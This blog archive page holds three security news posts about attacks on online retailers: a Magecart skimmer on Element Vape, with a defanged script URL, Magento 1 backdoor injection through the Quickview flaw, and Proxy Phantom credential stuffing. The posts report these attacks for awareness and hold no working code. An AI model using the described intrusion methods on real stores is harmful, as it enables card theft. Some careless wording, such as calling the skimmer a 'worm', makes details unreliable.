Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Online Retailers. Show all posts
Online Retailers
Card Skimming Data Breach HTML Magecart Malicious actor Online Retailers

Credit Cards Were Forged from a Prominent e-Cigarette Store

 

Since being breached, Element Vape, a famous online retailer of e-cigarettes including vaping kits, is harboring a credit card skimmer on its website. In both retail and online storefronts in the United States and Canada, this retailer provides e-cigarettes, vaping equipment, e-liquids, and Synthetic drugs.
 
Its website Element Vape is uploading a potentially Malicious file from either a third-party website that appears to be a credit card stealer. Magecart refers to threat actors who use credit card cybercriminals on eCommerce sites by infiltrating scripts. 

On numerous shop webpages, beginning with the homepage, a mystery base64-encoded script may be seen on pages 45-50 of the HTML source code. For an unknown period of time, the computer worm has so far been present on ElementVape.com. 

This code was gone as of February 5th, 2022, and before, according to a Wayback Machine review of ElementVape.com. As a result, the infection appears to have occurred more recently, probably after the date and before today's detection. When decoded, it simply fetches the appropriate JavaScript file from a third-party site :

/weicowire[.]com/js/jquery/frontend.js

When this script was decoded and examined, it was apparent – the collection of credit card and invoicing information from clients during the checkout. The script looks for email addresses, payment card details, phone numbers, and billing addresses (including street and ZIP codes). 

The attacker acquires these credentials via a predefined Telegram address in the script which is disguised. The code also has anti-reverse-engineering features which check if it's being run in a sandbox or with "devtools" to prevent it from being examined.

It's unclear how the backend code of ElementVape.com was altered in the first place to allow the malicious script to enter. Reportedly, this isn't the first instance Element Vape's security has been breached. Users reported getting letters from Element Vape in 2018 indicating the company had a data breach so the "window of penetration between December 6, 2017, and June 27, 2018, might have revealed users" personal details to threat actors. 
Read more »
Threat actors
Magecart Magento malware Online Retailers PHP Code Injection Threat actors

Several Magento Sites were Targeted by a Surge of MageCart Attacks

 

A large number of online stores using the Magento 1 e-commerce system were targeted by a web skimmer, according to Sansec, an eCommerce security consultancy. 

The crawler detected roughly 374 infections in a single day, indicating an onslaught. The infection was downloaded from the domain naturalfreshmall[.]com, which is presently offline. The threat operators' purpose was to steal credit card information from consumers at the targeted online retailers.

An attacker often uses a security flaw in the Quickview plugin to insert rogue admin users into susceptible Magento stores as the initial intrusion vector. Under this scenario, however, the flaw was exploited to add a default value resulting in the database being updated with a file carrying a simple backdoor. By just surfing the Magento login page, the validation requirements for prospective consumers would be used to initiate the code execution. 

By implementing a default value to the customer_ eav_attribute table, misuse is possible. The host app is tricked into creating a malicious entity, which is then utilized to generate a basic backdoor (api 1.php). As per Sansec, the intruders installed 19 backdoors on the hacked system, which means the affected sites must remove all of them to avoid being targeted in future attacks.

Although thousands of merchants continue to use it, the Magento 1 platform has hit End-of-Life, and Adobe no longer provides security upgrades for the same. As a result, the sites are accessible to a wide range of cyberattacks, putting the clients' sensitive information at risk. These details usually include credit card numbers, mailing addresses, names, phone numbers, and email addresses, as well as anything else required to complete an online order.

All Magento administrators should make sure it is running the most current edition of the platform and upgrade if it is on an older, unsupported version.
Read more »
User Security
Credential Stuffing Attacks Cyber Attacks Online Retailers User Security

Proxy Phantom Employs Automated Credential Stuffing Technique to Target Online Retailers

 

Cybersecurity researchers have exposed a massive fraud operation that targets e-commerce companies in account takeover attacks. 

Sift, a fraud prevention firm announced on Thursday that the hacker ring, dubbed Proxy Phantom, is employing over 1.5 million sets of stolen account credentials in automated credential stuffing assaults against online retailers.

Credential stuffing attacks usually depend on a large number of stolen or leaked credentials-username and password pairs-for one website and tests them on the login pages of other websites. The attacker’s motive is to secure unauthorized access to as many user accounts as possible and then carry out other assaults or fraudulent schemes. 

According to the estimation of Sift’s researchers, only 0.1% of credential stuffing assaults are successful. However, given the low success rate, you can attempt thousands of account combinations at the same time, these attacks can still be useful – particularly when employed against businesses or financial services.

Proxy Phantom "flooded businesses with bot-based login attempts to conduct as many as 2,691 login attempts per second,” as per Sift's Q3 2021 Digital Trust & Safety Index. Scammers also employed connected and rotating IP addresses to make the queries appear to stem from different geographical areas and primarily targeted e-commerce platforms and online services.

"As a result, targeted merchants using rules-based fraud prevention methods would be forced to play a supercharged, global game of "whack-a-mole," with new combinations of IP addresses and credentials (likely purchased in bulk on the dark web) coming for them at an unthinkable pace," Sift stated.

The study further reports that account takeover attacks identified by the company jumped by 307% over Q3. Specifically, the financial sector is a top target, including cryptocurrency exchanges and digital wallet services. 

Earlier this month, Netacea, a UK-based software firm released an index documenting the actions of scalper bots. These automated systems are manufactured to defeat online queues for high-ticket products like concert tickets and gaming consoles in order to resell and generate a profit for their operators.

 “Fraudsters will never stop adapting their techniques to overwhelm traditional fraud prevention, making suspicious logins look legitimate, and legitimate ones look suspicious. At the same time, poor consumer security habits—like reusing passwords for multiple accounts—make it easy and continue to breathe life into the fraud economy,” stated Jane Lee, trust and safety architect at Sift. 

“To proactively secure customer accounts and fuel expansion into new markets, merchants need to adopt a Digital Trust & Safety strategy to stop these advanced attacks before they shatter consumer loyalty and stifle growth,” she added.
Read more »
Subscribe to: Posts (Atom)